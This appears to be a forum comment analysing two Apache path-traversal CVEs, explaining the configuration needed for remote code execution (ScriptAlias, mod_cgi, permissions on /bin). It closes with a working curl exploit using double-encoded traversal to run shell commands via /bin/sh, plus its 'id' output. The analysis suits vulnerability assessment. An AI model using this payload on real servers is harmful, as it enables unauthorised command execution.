IMHO only "special" setups will be vulnerable to this RCE.
Same happens for the "arbitrary file read" exploits you have seen.
Both CVEs are indeed almost the same path-traversal vulnerability (2nd one is the uncomplete fix for 1st one).
Path traversal only work from a mapped URI (e.g. via "Alias" or "ScriptAlias" Apache directives). DocumentRoot only is not sufficient.
"/cgi-bin/" is mapped by default (ScriptAlias) so that's why it's being used before the path traversal string.
Besides, ScriptAlias marks as Exec (for Apache) all the contents for the given directory (regardless the file extensions).
1/ mod_cgi enabled (not default but easy)
2/ target binary should be +x (default for /bin/sh)
3/ apache permissions granted for /bin or / (not default and difficult/unrealistic)\
curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)